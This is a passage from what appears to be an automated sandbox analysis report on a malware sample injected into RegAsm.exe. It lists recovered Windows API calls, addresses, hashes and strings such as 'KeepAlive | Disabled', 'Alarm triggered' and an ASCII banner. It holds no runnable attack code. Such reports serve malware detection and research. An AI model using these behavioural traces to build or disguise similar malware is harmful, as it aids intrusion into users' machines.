                                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,0044338B,?,?,0044332B,?), ref: 0044340D
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                        • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                                                                                        • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                                                                                                                        • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                                                                                        • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                                                                                                                        APIs
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                                                                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00405140
                                                                                                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                                        • String ID: KeepAlive | Disabled
                                                                                                                                        • API String ID: 2993684571-305739064
                                                                                                                                        • Opcode ID: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                                                                                        • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                                                                                                                        • Opcode Fuzzy Hash: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                                                                                        • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                                                                                                        • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                                                                                                        • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                                                                                                        • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                                                        • String ID: Alarm triggered
                                                                                                                                        • API String ID: 614609389-2816303416
                                                                                                                                        • Opcode ID: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                                                                                        • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                                                                                                                        • Opcode Fuzzy Hash: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                                                                                        • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                                                                                                                        APIs
                                                                                                                                        • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                                                                                                        • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CE00
                                                                                                                                        • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CE0D
                                                                                                                                        • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CE20
                                                                                                                                        Strings
                                                                                                                                        • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                                                        • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                                                        • API String ID: 3024135584-2418719853
                                                                                                                                        • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                                                                                        • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                                                                                                                        • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                                                                                        • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                                                                                        • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                                                                                                                        • Opcode Fuzzy Hash: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                                                                                        • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                                                                                                                        APIs
                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                                                                                        • _free.LIBCMT ref: 0044943D
                                                                                                                                          • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                          • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                        • _free.LIBCMT ref: 00449609
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1286116820-0
                                                                                                                                        • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                                                                                                        • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                                                                                                                        • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                                                                                                        • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                                                          • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                                                                                                          • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                                                                                                                          • Part of subcall function 0041C076: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C096
                                                                                                                                          • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                                                          • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2180151492-0
                                                                                                                                        • Opcode ID: 50254459e3ae93045f6dbd6e6e7947e0bfa4b0136177b8b2dd2d26406979134f
                                                                                                                                        • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                                                                                                                        • Opcode Fuzzy Hash: 50254459e3ae93045f6dbd6e6e7947e0bfa4b0136177b8b2dd2d26406979134f
                                                                                                                                        • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                        • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                                                                        • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                                                                                                        • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                                                                        • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                                                                                                        APIs
                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00451231
                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                                                                                                                                        • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                                                                                                                                        • __freea.LIBCMT ref: 0045129D
                                                                                                                                          • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 313313983-0
                                                                                                                                        • Opcode ID: 695a5f3fdf384fa9d4863fe56c7c43b71593cfbe7e8d533d6dff3d4dffab5c55
                                                                                                                                        • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                                                                                                        • Opcode Fuzzy Hash: 695a5f3fdf384fa9d4863fe56c7c43b71593cfbe7e8d533d6dff3d4dffab5c55
                                                                                                                                        • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                                                                                                        APIs
                                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                                                                                                          • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                                                                                                        • _free.LIBCMT ref: 0044F43F
                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 336800556-0
                                                                                                                                        • Opcode ID: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                                                                                                                        • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                                                                                                        • Opcode Fuzzy Hash: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                                                                                                                        • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                                                                                                        APIs
                                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                                                                          • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                                                                                        • _free.LIBCMT ref: 100071B8
                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 336800556-0
                                                                                                                                        • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                        • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                                                                                        • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                        • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                                                                                                                        • _free.LIBCMT ref: 00448353
                                                                                                                                        • _free.LIBCMT ref: 0044837A
                                                                                                                                        • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                                                                                                                        • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3170660625-0
                                                                                                                                        • Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                                                                                        • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                                                                                                        • Opcode Fuzzy Hash: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                                                                                        • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                                                                        • _free.LIBCMT ref: 10005BB4
                                                                                                                                        • _free.LIBCMT ref: 10005BDB
                                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3170660625-0
                                                                                                                                        • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                        • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                                                                                        • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                        • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                                                                                        APIs
                                                                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                                                                        • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                        • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                        • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$lstrcat
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 493641738-0
                                                                                                                                        • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                        • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                                                                                        • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                        • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                                                                                        APIs
                                                                                                                                        • _free.LIBCMT ref: 00450A54
                                                                                                                                          • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                          • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                        • _free.LIBCMT ref: 00450A66
                                                                                                                                        • _free.LIBCMT ref: 00450A78
                                                                                                                                        • _free.LIBCMT ref: 00450A8A
                                                                                                                                        • _free.LIBCMT ref: 00450A9C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                        • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                                                        • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                                                                                                                        • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                                                        • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                                                                                                        APIs
                                                                                                                                        • _free.LIBCMT ref: 100091D0
                                                                                                                                          • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                          • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                        • _free.LIBCMT ref: 100091E2
                                                                                                                                        • _free.LIBCMT ref: 100091F4
                                                                                                                                        • _free.LIBCMT ref: 10009206
                                                                                                                                        • _free.LIBCMT ref: 10009218
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                        • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                        • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                                                                                        • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                        • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                                                                                        APIs
                                                                                                                                        • _free.LIBCMT ref: 00444106
